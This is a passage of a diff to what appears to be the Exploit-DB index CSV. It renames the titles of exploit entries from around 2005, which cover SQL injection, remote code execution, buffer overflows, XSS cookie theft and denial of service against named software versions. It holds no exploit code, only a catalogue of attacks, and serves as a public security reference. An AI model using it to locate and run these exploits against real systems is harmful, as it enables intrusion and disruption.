- 2.1.2 - SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 -1024,platforms/windows/dos/1024.html,"MS Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 -1025,platforms/windows/dos/1025.html,"MS Internet Explorer - javascript ""window()"" Crash",2005-05-31,"Benjamin Franz",windows,dos,0 +1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 +1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - javascript ""window()"" Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0 1028,platforms/windows/remote/1028.c,"Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0 @@ -848,9 +848,9 @@ id,file,description,date,author,platform,type,port 1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)",2005-06-08,N/A,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 -1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0 +1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 @@ -862,7 +862,7 @@ id,file,description,date,author,platform,type,port 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit",2005-06-17,mh_p0rtal,php,webapps,0 1053,platforms/php/webapps/1053.pl,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 -1055,platforms/linux/remote/1055.c,"PeerCast <= 0.1211 Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 +1055,platforms/linux/remote/1055.c,"PeerCast <= 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard <= 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 @@ -873,7 +873,7 @@ id,file,description,date,author,platform,type,port 1063,platforms/php/webapps/1063.pl,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)",2005-06-22,g30rg3_x,php,webapps,0 1064,platforms/php/webapps/1064.c,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)",2005-06-22,HaCkZaTaN,php,webapps,0 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 -1066,platforms/windows/remote/1066.cpp,"MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0 +1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0 @@ -886,7 +886,7 @@ id,file,description,date,author,platform,type,port 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 -1079,platforms/windows/remote/1079.html,"MS Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 +1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 1082,platforms/php/webapps/1082.pl,"XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit",2005-07-04,RusH,php,webapps,0 @@ -902,31 +902,31 @@ id,file,description,date,author,platform,type,port 1092,platforms/solaris/local/1092.c,"Solaris SPARC / x86 Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 1093,platforms/windows/dos/1093.c,"PrivaShare <= 1.3 - Denial of Service Exploit",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW <= 1.05 Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 -1095,platforms/php/webapps/1095.txt,"phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 +1095,platforms/php/webapps/1095.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 1096,platforms/windows/remote/1096.txt,"Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 -1097,platforms/php/webapps/1097.txt,"BlogTorrent <= 0.92 Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 +1097,platforms/php/webapps/1097.txt,"BlogTorrent <= 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 1099,platforms/windows/remote/1099.pl,"Baby Web Server <= 2.6.2 Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer <= 1.0 - Denial of Service Exploit",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service Exploit",2005-07-12,Kozan,windows,dos,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 -1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 +1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server <= 3.05.28 Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor <= 3.1.2.8 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 -1110,platforms/windows/dos/1110.txt,"MS Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0 +1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 -1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0 +1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 -1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 +1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 - Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 -1121,platforms/windows/dos/1121.pl,"FTPshell Server <= 3.38 Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 +1121,platforms/windows/dos/1121.pl,"FTPshell Server <= 3.38 - Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 @@ -943,9 +943,9 @@ id,file,description,date,author,platform,type,port 1138,platforms/linux/remote/1138.c,"nbSMTP <= 0.99 (util.c) Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 -1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 - Remote Code Execution 0Day",2005-08-09,Kartoffelguru,php,webapps,0 +1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 -1144,platforms/windows/remote/1144.html,"MS Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 +1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000 @@ -962,7 +962,7 @@ id,file,description,date,author,platform,type,port 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 -1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition Version <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 +1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 @@ -978,7 +978,7 @@ id,file,description,date,author,platform,type,port 1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 -1181,platforms/linux/local/1181.c,"MySQL 4.0.17 UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 +1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80 @@ -991,12 +991,12 @@ id,file,description,date,author,platform,type,port 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 (command) Denial of Service Exploit",2005-09-02,basher13,windows,dos,0 1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter Vulnerability",2005-09-02,basher13,windows,remote,0 -1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 +1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 -1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 +1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 @@ -1005,7 +1005,7 @@ id,file,description,date,author,platform,type,port 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 -1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 +1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort <= 2.4.0 SACK TCP Option Error Handling Denial of Service Exploit",2005-09-12,nitr0us,multiple,dos,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite <= 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 (iwconfig) Local Root Exploit (some setuid)",2005-09-14,Qnix,linux,local,0 @@ -1035,7 +1035,7 @@ id,file,description,date,author,platform,type,port 1241,platforms/php/webapps/1241.php,"Cyphor <= 0.19 (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 1242,platforms/linux/remote/1242.pl,"xine-lib <= 1.1 (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iGateway (debug mode) Remote Buffer Overflow Exploit",2005-10-10,egm,windows,remote,5250 -1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 +1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 (board takeover) SQL Injection Exploit",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 (Hijacking Command) Denial of Service Exploit",2005-10-11,basher13,windows,dos,0 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 @@ -1044,9 +1044,9 @@ id,file,description,date,author,platform,type,port 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 -1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 +1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 - Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 1255,platforms/windows/dos/1255.html,"Opera <= 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 -1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 +1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)",2005-10-19,Optyx,hp-ux,remote,0 @@ -1056,7 +1056,7 @@ id,file,description,date,author,platform,type,port 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 -1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 +1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0 @@ -1065,7 +1065,7 @@ id,file,description,date,author,platform,type,port 1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 -1276,platforms/windows/dos/1276.html,"MS Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 +1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort <= 2.4.2 BackOrifice Remote Buffer Overflow Exploit (meta)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 @@ -1077,7 +1077,7 @@ id,file,description,date,author,platform,type,port 1285,platforms/windows/dos/1285.c,"Scorched 3D <= 39.1 - Multiple Vulnerabilities (All-in-One) (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1288,platforms/linux/remote/1288.pl,"Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 +1288,platforms/linux/remote/1288.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 @@ -1125,7 +1125,7 @@ id,file,description,date,author,platform,type,port 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 -1356,platforms/php/webapps/1356.php,"DoceboLMS <= 2.0.4 connector.php Shell Upload Exploit",2005-12-04,rgod,php,webapps,0 +1356,platforms/php/webapps/1356.php,"DoceboLms <= 2.0.4 connector.php Shell Upload Exploit",2005-12-04,rgod,php,webapps,0 1357,platforms/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow Exploit",2005-12-04,"Kevin Finisterre",windows,remote,0 1358,platforms/php/webapps/1358.php,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0 @@ -1140,10 +1140,10 @@ id,file,description,date,author,platform,type,port 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D <= 0.1.0.1 - Denial of Service Vulnerability",2005-12-11,"Iman Karim",windows,dos,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 (phpcoinsessid) SQL Inj / Remote Code Execution Exploit",2005-12-12,rgod,php,webapps,0 -1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 Remote Denial of Service Exploit",2005-12-14,Kozan,windows,dos,0 -1372,platforms/windows/dos/1372.html,"MS Internet Explorer 6.0 (pre tag multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 +1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service Exploit",2005-12-14,Kozan,windows,dos,0 +1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 -1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 +1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit 